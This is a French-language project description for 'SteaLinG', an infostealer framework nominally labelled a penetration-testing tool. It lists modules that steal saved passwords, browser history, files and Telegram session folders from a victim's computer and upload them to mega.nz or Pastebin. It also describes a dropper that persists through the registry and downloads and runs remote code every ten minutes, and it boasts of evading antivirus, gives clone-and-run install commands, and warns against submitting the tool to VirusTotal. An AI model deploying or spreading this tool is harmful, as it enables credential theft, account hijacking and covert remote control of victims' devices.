
Le SteaLinG est un framework de test d'intrusion open-source conçu pour l'ingénierie sociale
SteaLinG est un framework de tests d'intrusion open source conçu pour l'ingénierie sociale. Après le piratage, vous pouvez le télécharger sur l'appareil de la victime et l'exécuter.
Ceci est uniquement à des fins de test et ne peut être utilisé qu'avec un consentement strict. Ne pas utiliser à des fins illégales.
En raison de la fermeture de anonfiles.com, j'ai modifié le code, et il télécharge désormais les résultats sur mega.nz
| module | Description courte |
|---|---|
| Vol de mots de passe | Voler tous les mots de passe enregistrés, télécharger le fichier des mots de passe vers mega -pastebin |
| Vol d'historique | Récupérer l'historique du navigateur, télécharger le fichier de l'historique vers mega -pastebin |
| Vol de fichiers | Voler les fichiers du disque dur avec l'extension souhaitée, télécharger vers mega |
| Détournement de session Telegram | Détourneur de session Telegram, téléchargement vers Mega |
| Dropper | Voir ci-dessous |
| module | Description courte |
|---|---|
| 1-Détournement de session Telegram | Détourneur de session Telegram |
C:\Users\<nom du pc>\AppData\Roaming\Telegram Desktop
dans le dossier 'tdata'C:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Une fois que vous avez déplacé ce dossier, avec tout son contenu, vers votre appareil dans le même chemin, il vous suffit d'effectuer l'action requise. L'outil s'occupe de tout, et tout ce que vous avez à faire est de fournir votre email et mot de passe sur le site https://mega.nz/. La première étape consiste à naviguer jusqu'à l'emplacement du fichier tdata, puis à le convertir en fichier zip. Si Telegram fonctionne correctement, cette erreur ne se produira pas. Si une erreur se produit, cela signifie que Telegram est ouvert, et vous devez terminer ses processus. Vous remarquerez que ce comportement est malveillant, donc je l'ai complètement évité en utilisant try et except dans le code. Le nom du fichier archive est utilisé comme nom de l'appareil de la victime, car si vous avez plusieurs appareils, il est possible de les différencier. Ensuite, vous soumettez une demande pour le fichier zip sur le site mega en utilisant l'email et le mot de passe. C'est tout, il n'est détecté par aucun antivirus.
| module |
|---|
| 2- Dropper |
.exe ou .png, ou toute autre extension importante. L'important est que le lien se termine par une extension (.une extension quelconque).
La deuxième chose est d'obtenir la clé API de votre part, que vous fournirez également. Vous pouvez vous inscrire et cliquer sur le mot "API" pour la trouver, puis noter le nom d'utilisateur et le mot de passe.
La première chose à faire est de créer un paste privé sur le site. Ensuite, il ajoute l'URL que vous avez fournie et vous donne l'exécutable (exe). Sa fonction est de s'ajouter au registre de l'appareil de deux manières différentes lorsqu'il s'exécute sur n'importe quel appareil.
D'abord, il ouvre le site Pastebin et insère le paste spécial que vous avez créé. Il prend ensuite l'URL du paste, télécharge son contenu et l'exécute. De plus, vous pouvez entrer une autre URL à tout moment. C'est très normal car le dropper vérifie l'URL toutes les 10 minutes. S'il trouve une nouvelle URL, il télécharge son contenu, s'y connecte et continue de s'exécuter. Vous n'avez rien à faire. Ainsi, toutes les 10 minutes, vous pouvez accéder à votre appareil depuis n'importe où.
3- Support Linux
4- Vous pouvez maintenant choisir entre Mega ou Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

